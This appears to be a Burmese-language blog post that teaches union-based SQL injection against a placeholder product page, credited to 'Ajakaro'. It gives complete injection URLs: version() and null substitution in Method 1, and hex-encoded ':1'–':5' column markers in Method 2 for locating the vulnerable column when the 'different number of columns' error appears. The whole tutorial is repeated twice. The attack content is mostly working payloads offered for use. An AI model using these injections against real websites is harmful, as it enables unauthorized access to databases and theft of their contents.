က်ေနာ္တို႕ ပံုမွန္အတိုင္းဘဲ union based နဲ႕ SQL Inject လုပ္တဲ့အခါမွာ column အေရအတြက္ကိုသိၿပီဆိုပါေတာ့။ဥပမာ အေနနဲ႕ column 5 ခုရွိတယ္ဆိုပါစို႔။
http://www.site.com/product.php?id=5 union select 1,2,3,4,5--
အေပၚကလို query နဲ႔ sqli ထိုးတဲ့ အခါမွာ
The used SELECT statements have a different number of columns ဆိိုၿပီး error တက္တယ္ဆိုရင္ ပံုမွန္ အားျဖင့္ က်ေနာ္ေတာ့ error based နဲ႔ လုပ္လို႔ရပါတယ္။
union based နဲ႕ပဲဆက္စမ္းၾကည့္ခ်င္တယ္ဆိုရင္ေတာ့
Method 1#
version() ကို column အားလံုးမွာ အစားသြင္းၾကည့္မယ္။ေအာက္ကလို query မ်ိဳးျဖစ္သြားမယ္။
http://www.site.com/product.php?id=5 union select
version(),version(),version(),version(),version()-- -
ဒီလိုမလုပ္ခ်င္ရင္ column တခုခ်င္းစီမွာ version() ကိုထည့္ၾကည့္မယ္။version ေပၚလာတယ္ဆိုရင္ေတာ့ ရၿပီေပါ့။
တကယ္လို႔ အလုပ္မလုပ္ဘူးဆိုရင္ တျခား column ေတြမွာ null ထည့္ၾကည့္မယ္။ေအာက္ကလို query မ်ိဳးျဖစ္သြားမယ္။
http://www.site.com/product.php?id=5 union select null,version(),3,4,5-- -
Method 2#
က်ေနာ္တို႕ version() ကိုမသံုးဘဲ သူ႔ေနရာမွာ : နဲ႔ column number ကိုတြဲေရးမယ္။ဥပမာ
union select :1,:2,:3,:4-- - ဒီလိုပံုစံမ်ိဳးပါ။
hex value ေျပာင္းေပးဖို႕ေတာ့ လိုပါတယ္။
:1->0x3a31
:2->0x3a32
ဒီလိုမ်ိဳးပါ။query အျပည့္အစံုက
http://www.site.com/product.php?id=5 union select 0x3a31,0x3a32,0x3a33,0x3a34,0x3a35-- -
ဒီ query ကိုသံုးၿပီးေတာ့ က်ေနာ္တုိ႕ vul column ကို error ေတြထဲမွာေတြ႕နိုင္ပါတယ္။
Credit to Ajakaro
http://www.site.com/product.php?id=5 union select 1,2,3,4,5--
အေပၚကလို query နဲ႔ sqli ထိုးတဲ့ အခါမွာ
The used SELECT statements have a different number of columns ဆိိုၿပီး error တက္တယ္ဆိုရင္ ပံုမွန္ အားျဖင့္ က်ေနာ္ေတာ့ error based နဲ႔ လုပ္လို႔ရပါတယ္။
union based နဲ႕ပဲဆက္စမ္းၾကည့္ခ်င္တယ္ဆိုရင္ေတာ့
Method 1#
version() ကို column အားလံုးမွာ အစားသြင္းၾကည့္မယ္။ေအာက္ကလို query မ်ိဳးျဖစ္သြားမယ္။
http://www.site.com/product.php?id=5 union select
version(),version(),version(),version(),version()-- -
ဒီလိုမလုပ္ခ်င္ရင္ column တခုခ်င္းစီမွာ version() ကိုထည့္ၾကည့္မယ္။version ေပၚလာတယ္ဆိုရင္ေတာ့ ရၿပီေပါ့။
တကယ္လို႔ အလုပ္မလုပ္ဘူးဆိုရင္ တျခား column ေတြမွာ null ထည့္ၾကည့္မယ္။ေအာက္ကလို query မ်ိဳးျဖစ္သြားမယ္။
http://www.site.com/product.php?id=5 union select null,version(),3,4,5-- -
Method 2#
က်ေနာ္တို႕ version() ကိုမသံုးဘဲ သူ႔ေနရာမွာ : နဲ႔ column number ကိုတြဲေရးမယ္။ဥပမာ
union select :1,:2,:3,:4-- - ဒီလိုပံုစံမ်ိဳးပါ။
hex value ေျပာင္းေပးဖို႕ေတာ့ လိုပါတယ္။
:1->0x3a31
:2->0x3a32
ဒီလိုမ်ိဳးပါ။query အျပည့္အစံုက
http://www.site.com/product.php?id=5 union select 0x3a31,0x3a32,0x3a33,0x3a34,0x3a35-- -
ဒီ query ကိုသံုးၿပီးေတာ့ က်ေနာ္တုိ႕ vul column ကို error ေတြထဲမွာေတြ႕နိုင္ပါတယ္။
Credit to Ajakaro
No comments:
Post a Comment